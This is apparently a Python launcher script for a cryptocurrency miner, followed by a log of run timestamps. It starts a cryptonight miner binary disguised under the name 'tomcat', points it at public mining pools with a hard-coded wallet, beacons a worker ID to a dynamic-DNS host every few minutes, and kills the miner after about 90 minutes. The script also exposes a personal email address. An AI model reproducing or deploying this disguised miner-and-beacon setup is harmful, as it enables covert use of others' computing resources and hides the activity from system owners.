import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:34:05.554230
#2018-02-17 16:19:06.124619
#2018-02-17 18:07:01.904323
#2018-02-17 19:55:06.411069
#2018-02-17 21:43:05.083951
#2018-02-17 23:27:03.834325
#2018-02-18 01:16:07.333629
#2018-02-18 03:03:06.417220
#2018-02-18 04:52:03.573161
#2018-02-18 06:44:04.215602
#2018-02-18 08:32:05.578934
#2018-02-18 10:19:05.246194
#2018-02-18 12:05:08.499215
#2018-02-18 13:51:06.460155
#2018-02-18 15:43:05.862089
#2018-02-18 17:33:05.647206
#2018-02-18 19:21:06.697447
#2018-02-18 21:06:05.467324
#2018-02-18 22:53:01.893797
#2018-02-19 00:41:05.683750
#2018-02-19 02:27:03.633695
#2018-02-19 04:14:05.537202
#2018-02-19 05:58:07.052888
#2018-02-19 07:48:04.856692
#2018-02-19 09:38:05.634601
#2018-02-19 11:28:05.690607
#2018-02-19 13:14:07.660990
#2018-02-19 15:03:04.900755
#2018-02-19 16:50:03.675482
#2018-02-19 18:38:04.419370
#2018-02-19 20:23:05.612629
#2018-02-19 22:11:01.908002
#2018-02-19 23:57:01.834683
#2018-02-20 01:44:01.462883
#2018-02-20 03:33:01.471781
#2018-02-20 05:19:07.074390
#2018-02-20 07:04:06.148993
#2018-02-20 08:49:06.015910
#2018-02-20 10:33:07.408784
#2018-02-20 12:18:07.077590
#2018-02-20 14:05:05.346494
#2018-02-20 15:49:14.877690
#2018-02-20 17:36:07.759764
#2018-02-20 19:23:08.678416
#2018-02-20 21:13:03.828051
#2018-02-20 22:59:02.048490
#2018-02-21 00:42:06.949139
#2018-02-21 02:27:04.398579
#2018-02-21 04:13:03.143095
#2018-02-21 06:01:01.992054
#2018-02-21 07:48:01.594326
#2018-02-21 09:28:06.678720
#2018-02-21 11:17:04.857337
#2018-02-21 13:04:07.478291
#2018-02-21 14:52:05.690323
#2018-02-21 16:39:08.611698
#2018-02-21 18:29:07.217850
#2018-02-21 20:15:05.245400
#2018-02-21 22:03:04.025941
#2018-02-21 23:51:02.030420
#2018-02-22 01:40:03.424926
#2018-02-22 03:27:03.725752
#2018-02-22 05:14:05.675723
#2018-02-22 06:58:06.186996
#2018-02-22 08:46:08.331171
#2018-02-22 10:34:05.656626
#2018-02-22 12:21:06.679464
#2018-02-22 14:06:06.911531
#2018-02-22 15:52:07.780991
#2018-02-22 17:39:08.953829
#2018-02-22 19:26:01.892766
#2018-02-22 21:19:08.207347
#2018-02-22 23:06:06.424959
#2018-02-23 00:53:05.452318
#2018-02-23 02:40:04.739933
#2018-02-23 04:29:06.381214
#2018-02-23 06:16:07.744223
#2018-02-23 08:03:05.429384
#2018-02-23 10:18:07.790255
#2018-02-23 12:08:05.506128
#2018-02-23 13:55:07.922024
#2018-02-23 15:48:10.139135
#2018-02-23 17:33:07.430106
#2018-02-23 19:21:06.753504
#2018-02-23 21:04:07.310651
#2018-02-23 22:50:01.499699
#2018-02-24 00:38:05.560144
#2018-02-24 02:28:05.490020
#2018-02-24 04:19:07.724460
#2018-02-24 06:07:01.968632
#2018-02-24 07:54:08.179503
#2018-02-24 09:40:01.768601
#2018-02-24 11:35:09.156289
#2018-02-24 13:25:09.098920
#2018-02-24 15:14:04.310726
#2018-02-24 17:03:05.150525
#2018-02-24 18:53:04.494297
#2018-02-24 20:41:07.773777
#2018-02-24 22:51:01.205485
#2018-02-25 02:11:04.708309
#2018-02-25 05:53:06.499545
#2018-02-25 11:38:04.047270